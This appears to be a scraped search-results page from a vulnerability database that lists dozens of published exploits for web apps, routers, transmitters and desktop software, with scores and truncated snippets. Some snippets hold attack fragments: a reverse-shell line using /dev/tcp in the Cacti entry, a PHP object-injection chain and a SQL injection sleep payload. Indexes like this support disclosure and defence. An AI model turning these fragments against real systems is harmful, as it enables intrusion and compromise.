Lucene search
K
ZdtMost viewed

39001 matches found

0day.today
0day.today
added 2024/01/21 12:0 a.m.268 views

MiniWeb HTTP Server 0.8.1 Denial Of Service Exploit

!/usr/bin/perl use IO::Socket; Exploit Title: MiniWeb HTTP Server 0.8.1 - Denied of Service DoS Discovery by: Fernando Mengali Discovery Date: 19 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1AVHSlsYj5Ukw9co9M2Ql6RsqCTzbI038/view?usp=sharing Notification...

7.4AI score
Exploits0
0day.today
0day.today
added 2023/05/02 12:0 a.m.268 views

projectSend r1605 - Private file download Vulnerability

Exploit Title: projectSend r1605 - Private file download Application: projectSend Version: r1605 Bugs: IDOR Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 24-01-2023 Author: Mirabbas Ağalarov Tested on: Linux Technical Details &...

6.9AI score
Exploits0
0day.today
0day.today
added 2023/04/14 12:0 a.m.268 views

Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset Vulnerability

Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3...

6.8AI score
Exploits0
0day.today
0day.today
added 2023/04/06 12:0 a.m.268 views

Music Gallery Site v1.0 - SQL Injection Vulnerability (3)

Exploit Title: Music Gallery Site v1.0 - SQL Injection on page Master.php Exploit Author: Muhammad Navaid Zafar Ansari CVE Assigned: CVE-2023-0962 mitre.org nvd.nist.org Vendor Homepage: https://www.sourcecodester.com Software Link: Music Gallery Site Version: v 1.0 Tested on: Windows 11 SQL...

8.8CVSS8.8AI score0.01741EPSS
Exploits5
0day.today
0day.today
added 2023/01/10 12:0 a.m.268 views

Tiki Wiki CMS Groupware 24.0 grid.php PHP Object Injection Vulnerability

----------------------------------------------------------------------------- Tiki Wiki CMS Groupware const popChain = 'O:25:"SearchElasticConnection":1:S:31:"\00SearchElasticConnection\00bulk";O:28:"SearchElasticBulkOper...

8.8CVSS7.8AI score0.01168EPSS
Exploits3
0day.today
0day.today
added 2022/09/19 12:0 a.m.268 views

Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion Vulnerabilities

Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities Exploit Author: Chokri Hammedi Vendor Homepage: https://www.skyjos.com/ Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524 Version: 12.0.1 Tested on: Ios 16.0 path traversal on HTTP built-in server GET...

Exploits0
0day.today
0day.today
added 2022/09/02 12:0 a.m.268 views

WordPress Netroics Blog Posts Grid 1.0 Plugin - Stored XSS Vulnerability

Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting XSS Exploit Author: saitamang, syad, yunaranyancat Vendor Homepage: wordpress.org Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip Version: 1.0 Tested on: Centos 7 apache2 ...

0.1AI score
Exploits0
0day.today
0day.today
added 2022/06/14 12:0 a.m.268 views

Real Player v.20.0.8.310 G2 Control - DoGoToURL() Remote Code Execution Exploit

Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL' Remote Code Execution RCE Exploit Author: Eduardo Braun Prado Vendor Homepage: http://real.com/ Software Link: http://real.com/ Version: v.20.0.8.310 Tested on: Windows 7, 8.1, 10 CVE : N/A Full PoC:...

7.4AI score
Exploits0
0day.today
0day.today
added 2022/06/14 12:0 a.m.268 views

Marval MSM v14.19.0.12476 - Remote Code Execution (Authenticated) Vulnerability

Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution RCE Authenticated Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.marvalnorthamerica.com/ Software Link: https://www.marvalnorthamerica.com/ Version: v14.19.0.12476 Tested on: Windows Detailed blog:...

7.4AI score
Exploits0
0day.today
0day.today
added 2022/03/30 12:0 a.m.268 views

PostgreSQL 9.3-11.7 - Remote Code Execution (Authenticated) Exploit

Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution RCE Authenticated Exploit Author: b4keSn4ke Github: https://github.com/b4keSn4ke Vendor Homepage: https://www.postgresql.org/ Software Link: https://www.postgresql.org/download/linux/debian/ Version: 9.3 - 11.7 Tested on: Linux x86-64 -...

7.2CVSS0.2AI score0.91877EPSS
Exploits17
0day.today
0day.today
added 2019/12/04 12:0 a.m.268 views

OwnCloud 8.1.8 - Username Disclosure Vulnerability

Exploit for php platform in category web applications Exploit Title: OwnCloud 8.1.8 - Username Disclosure Exploit Author : Daniel Moreno Vendor Homepage : https://owncloud.org/ Link Software : https://ftp.icm.edu.pl/packages/owncloud/ old version. Download at your own risk Tested on OS: CentOS Po...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/06/26 12:0 a.m.268 views

SuperDoctor5 - (NRPE) Remote Code Execution Exploit

SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'. This is an intended feature but leaves the system open by default to unauthenticated remote command execution by abusing the...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/12/12 12:0 a.m.268 views

McAfee True Key - McAfee.TrueKey.Service Privilege Escalation Vulnerability

Exploit for windows platform in category local exploits McAfee True Key: Multiple Issues with McAfee.TrueKey.Service Implementation Platform: Version 5.1.173.1 on Windows 10 1809. Class: Elevation of Privilege Summary: There are multiple issues in the implementation of the McAfee.TrueKey.Service...

0.2AI score0.01137EPSS
Exploits3
0day.today
0day.today
added 2018/11/15 12:0 a.m.268 views

Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin) Vulnerability

Exploit for php platform in category web applications Exploit Title: Precurio Intranet Portal 2.0 - Cross-Site Request Forgery Add Admin Exploit Author: Ihsan Sencan Vendor Homepage: http://www.precurio.org Software Link:...

0.5AI score
Exploits0
0day.today
0day.today
added 2016/05/04 12:0 a.m.268 views

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Esc

Exploit for linux platform in category local exploits Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 In Linux =4.4, when the CONFIGBPFSYSCALL config option is set and the kernel.unprivilegedbpfdisabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use...

7.2CVSS0.6AI score0.10202EPSS
Exploits5
0day.today
0day.today
added 2024/04/22 12:0 a.m.267 views

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass Vulnerability

Elber Signum DVB-S/S2 IRD for Radio Networks version 1.999 suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the setpwd endpoint that enables th...

7.8AI score
Exploits0
0day.today
0day.today
added 2024/03/27 12:0 a.m.267 views

LimeSurvey Community 5.3.32 - Stored XSS Vulnerability

Exploit Title: Stored Cross-Site Scripting XSS in LimeSurvey Community Edition Version 5.3.32+220817 Exploit Author: Subhankar Singh Vendor: LimeSurvey Software Link: https://community.limesurvey.org/releases/ Version: LimeSurvey Community Edition Version 5.3.32+220817 Tested on: Windows Client...

6.1CVSS7.4AI score0.00677EPSS
Exploits4
0day.today
0day.today
added 2024/03/27 12:0 a.m.267 views

WordPress Bricks Builder Theme 1.9.6 Remote Code Execution Exploit

This Metasploit module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder Theme versions 1.9.6 and below for WordPress. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval...

10CVSS10AI score0.88234EPSS
Exploits18
0day.today
0day.today
added 2023/07/19 12:0 a.m.267 views

TP-Link TL-WR740N - Authenticated Directory Transversal Vulnerability

Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal Exploit Author: Anish Feroz Zeroxinn Vendor Homepage: http://www.tp-link.com Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n Tested on: TP-Link TL-WR740N ---------------------------POC---------------------------...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/07/15 12:0 a.m.267 views

XAMPP 8.2.4 - Unquoted Path Vulnerability

Exploit Title: XAMPP 8.2.4 - Unquoted Path Exploit Author: Andrey Stoykov Version: 8.2.4 Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe Tested on: Windows Server 2022 Blog: http://msecureltd.blogspot.com/ Steps to...

7.4AI score
Exploits0
0day.today
0day.today
added 2023/05/31 12:0 a.m.267 views

Rukovoditel 3.3.1 - CSV injection Vulnerability

Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC...

7.1AI score
Exploits0
0day.today
0day.today
added 2022/10/03 12:0 a.m.267 views

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution Vulnerabilities

ADVISORY INFORMATION Product: ZKSecurity BIO Vendor: ZKTeco https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurityV50004.1.2 Version Affected: 4.1.2 CVE: CVE-2022-36635 Vulnerability: SQL Injection with a plus: RCE CREDIT This vulnerability was discovered and researched by Caio Burgardt and Silton...

8.8CVSS0.6AI score0.16587EPSS
Exploits3
0day.today
0day.today
added 2022/05/31 12:0 a.m.267 views

Ingredient Stock Management System 1.0 SQL Injection Vulnerability

Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection Exploit Author: Saud Alenazi Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html Version: 1.0...

0.5AI score
Exploits0
0day.today
0day.today
added 2022/04/19 12:0 a.m.267 views

Fuel CMS 1.5.0 - Cross-Site Request Forgery Vulnerability

Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery CSRF Google Dork: NA Exploit Author: Ali J Vendor Homepage: https://www.getfuelcms.com/ Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0 Version: 1.5.0 Tested on: Windows 10 Steps to Reproduce: 1. Login with us...

1.5AI score
Exploits0
0day.today
0day.today
added 2022/02/23 12:0 a.m.267 views

WebHMI 4.1.1 Remote Code Execution Exploit

Exploit Title: WebHMI 4.1.1 - Remote Code Execution RCE Authenticated Exploit Author: Antonio Cuomo arkantolo Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI 4.1.1.7662 Tested on: WebHMI-4.1.1.7662 !/usr/bin/python import sys import re import argparse import requests import time import...

7.4AI score
Exploits0
0day.today
0day.today
added 2022/02/16 12:0 a.m.267 views

ServiceNow - Username Enumeration Exploit

Exploit Title: ServiceNow - Username Enumeration Exploit Author: Victor Hanna Trustwave SpiderLabs Author Github Page: https://9lyph.github.io/CVE-2021-45901/ Vendor Homepage: https://www.servicenow.com/ Software Link:...

5.3CVSS5.4AI score0.14316EPSS
Exploits5
0day.today
0day.today
added 2021/07/27 12:0 a.m.267 views

WordPress Social Warfare 3.5.2 Remote Code Execution Exploit

WordPress Social Warfare plugin version 3.5.2 remote code execution exploit. This fully automated exploit is a variation of the original discovery made by Luka Sikic and hash3liZer in May of 2019. Author = Raed Ahsan Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution...

6.1CVSS0.5AI score0.73543EPSS
Exploits20
0day.today
0day.today
added 2020/07/27 12:0 a.m.267 views

elaniin CMS - Authentication Bypass Vulnerability

Exploit for php platform in category web applications Exploit Title: elaniin CMS 1.0 - Authentication Bypass Exploit Author: BKpatron Vendor Homepage:https://elaniin.com/ Software Link:https://github.com/elaniin/CMS/archive/master.zip Version: v1.0 Tested on: Win 10 CVE: N/A Vulnerability: Attack...

Exploits0
0day.today
0day.today
added 2020/07/20 12:0 a.m.267 views

Directory Management System (DMS) 1.0 SQL Injection Vulnerability

Directory Management System DMS version 1.0 suffers from multiple remote SQL Injection vulnerabilities, one of which allows for authentication bypass. Exploit Title: Directory Management System DMS 1.0 - Authentication Bypass Exploit Author: gh1mau Team Members: Capt'N,muzzo,chaos689 |...

Exploits0
0day.today
0day.today
added 2020/07/09 12:0 a.m.267 views

Webtareas 2.1 / 2.1p File Upload / Information Disclosure Vulnerabilities

Exploit for php platform in category web applications Authenticated File Upload vulnerability Author: AppleBois Homepage: https://sourceforge.net/projects/webtareas/ Affected Version: 2.1 && 2.1p Vendors Claim there's a patch on 2.1p but it's vulnerable and been few weeks without response. ".exe"...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/05/24 12:0 a.m.267 views

Microsoft Windows 10 (17763.379) - Install DLL Exploit

Exploit for windows platform in category local exploits edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the...

7.2AI score
Exploits0
0day.today
0day.today
added 2018/11/16 12:0 a.m.267 views

Galaxy Forces MMORPG 0.5.8 - type SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://galaxy.alyx.pl/ Software Link: https://excellmedia.dl.sourceforge.net/project/galaxyforces/galaxy/0.5.8/galaxy-0.5.8.7z...

0.2AI score
Exploits0
0day.today
0day.today
added 2018/11/16 12:0 a.m.267 views

2-Plan Team 1.0.4 - Arbitrary File Upload Vulnerability

Exploit for php platform in category web applications Exploit Title: 2-Plan Team 1.0.4 - Arbitrary File Upload Exploit Author: Ihsan Sencan Vendor Homepage: http://2-plan.com/ Software Link: https://datapacket.dl.sourceforge.net/project/to-plan-team/1.1.0/2-plan-team.tgz Version: 1.0.4 Category:...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/11/14 12:0 a.m.267 views

Gumbo CMS 0.99 - SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: Gumbo CMS 0.99 - SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://gumbo-cms.net/ Software Link: https://netix.dl.sourceforge.net/project/gumbo-cms/0.99%20beta/gumbo-0.99beta.zip Version: 0.99 Category: Webapps...

Exploits0
0day.today
0day.today
added 2017/04/25 12:0 a.m.267 views

Solarwinds LEM 6.3.1 Hardcoded Credentials Vulnerability

The Postgres database on Solarwinds Log and Event Manager Virtual Appliance version 6.3.1 has default hardcoded credentials. While some security measures were taken to ensure that network connectivity to the Postgres database wouldn't be possible using IPv4, the same measures were not taken for...

6.7AI score
Exploits0
0day.today
0day.today
added 2013/12/02 12:0 a.m.267 views

TVT TD-2308SS-B DVR - Directory Traversal Vulnerability

TVT TD-2308SS-B DVR and possibly other models running firmware version 3.2.0.P-3520A-00 contain a directory traversal vulnerability. An attacker can use directory traversal to download critical files such as the config.dat file for the device which contains the credentials for the web interface...

7.8CVSS6.7AI score0.10223EPSS
Exploits6
0day.today
0day.today
added 2024/03/04 12:0 a.m.266 views

A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc Exploit

!/usr/bin/python Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + somememorycopyfunction ROP chain Date: 16 November 2023 Exploit Author: George Washington Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm Software Link:...

7.4AI score
Exploits0
0day.today
0day.today
added 2023/12/04 12:0 a.m.266 views

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure Vulnerability

R Radio Network FM Transmitter version 1.07 suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access. R Radio Network...

7.9AI score
Exploits0
0day.today
0day.today
added 2023/09/12 12:0 a.m.266 views

Equipment Rental Script 1.0 SQL Injection Vulnerability

Title: Equipment Rental Script-1.0 - SQLi Author: nu11secur1ty Vendor: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/equipment-rental-script/sectionDemo Reference: https://portswigger.net/web-security/sql-injection Description: The packageid parameter appears to be vulnerable t...

7.4AI score
Exploits0
0day.today
0day.today
added 2023/08/04 12:0 a.m.266 views

WordPress Forminator 1.24.6 Plugin - Unauthenticated Remote Command Execution Vulnerability

Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution Exploit Author: Mehmet Kelepçe Vendor Homepage: https://wpmudev.com/project/forminator-pro/ Software Link: https://wordpress.org/plugins/forminator/ Version: 1.24.6 Tested on: PHP - Mysql - Apache2 -...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/08/01 12:0 a.m.266 views

Online Diagnostic Lab Management 1.0 SQL Injection Vulnerability

Title: Online-Diagnostic-Lab-Management v1.0 Multiple-SQLi Author: nu11secur1ty Vendor: https://www.youtube.com/watch?v=0nA5xfQ5G0g Vendor: https://www.youtube.com/@MayuriK Software:...

7.4AI score
Exploits0
0day.today
0day.today
added 2023/07/15 12:0 a.m.266 views

Pluck v4.7.18 - Remote Code Execution Exploit

Exploit Title: Pluck v4.7.18 - Remote Code Execution RCE Application: pluck Version: 4.7.18 Bugs: RCE Technology: PHP Vendor URL: https://github.com/pluck-cms/pluck Software Link: https://github.com/pluck-cms/pluck Date of found: 10-07-2023 Author: Mirabbas Ağalarov Tested on: Linux import reques...

7.1AI score
Exploits0
0day.today
0day.today
added 2023/05/29 12:0 a.m.266 views

New MVC Shop 1.0 SQL Injection / Missing Attributes Vulnerability

Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak security PHPSESSID Hijacking Author: nu11secur1ty Vendor: https://chikoiquan.tanhongit.com/ Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0 Reference: https://portswigger.net/web-security/sql-injection Description: The...

7.4AI score
Exploits0
0day.today
0day.today
added 2023/03/31 12:0 a.m.266 views

Cacti v1.2.22 - Remote Command Execution Exploit

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

9.8CVSS9.4AI score0.99826EPSS
Exploits48
0day.today
0day.today
added 2023/03/27 12:0 a.m.266 views

WordPress NEX-Forms plugin < 7.9.7 - Authenticated SQL injection Vulnerability

Exploit Title: NEX-Forms WordPress plugin =3D 5.0.12 AND time-based blind query SLEEP Payload: page=3Dnex-forms-dashboard&formid=3D1 AND SELECT 4715 FROM SELECTSLEEP5nPUi...

8.8CVSS8.8AI score0.10375EPSS
Exploits5
0day.today
0day.today
added 2022/12/10 12:0 a.m.266 views

Delta Electronics DVW-W02W2-E2 2.42 Command Injection Vulnerability

Delta Electronics DVW-W02W2-E2 version 2.42 suffers from an authenticated command injection vulnerability. ------------------------------------------------------------------------------- title| Authenticated Command Injection product| Delta Electronics DVW-W02W2-E2 vulnerable version| V2.42 fixed...

0.7AI score
Exploits0
0day.today
0day.today
added 2022/10/05 12:0 a.m.266 views

Joomla Solidres 2.12.9 Cross Site Scripting Vulnerability

┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploits ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Solidres Team │ │ Software :...

7.4AI score
Exploits0
0day.today
0day.today
added 2022/04/11 12:0 a.m.266 views

Telesquare TLR-2855KS6 - Arbitrary File Deletion Vulnerability

Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: http://www.telesquare.co.kr/ Version: TLR-2855KS6 Tested on: Linux Firefox CVE : CVE-2021-46419 Proof of Concept DELETE /cgi-bin/test.cgi HTTP/1.1 Host: 192.168.1.5...

9.1CVSS0.6AI score0.71384EPSS
Exploits4
0day.today
0day.today
added 2022/02/23 12:0 a.m.266 views

Simple Mobile Comparison Website v1.0 - SQL injection Vulnerability

Title: Simple Mobile Comparison Website v1.0 - SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html Reference:...

0.4AI score
Exploits0
0day.today
0day.today
added 2022/02/08 12:0 a.m.266 views

Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) Exploit

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Strapi CMS 3.0.0-beta.17.4 - Set Password Unauthenticated Metasploit", 'Description' = %q This exploit module abuses the...

9.8CVSS0.4AI score0.97639EPSS
Exploits13
Total number of security vulnerabilities5000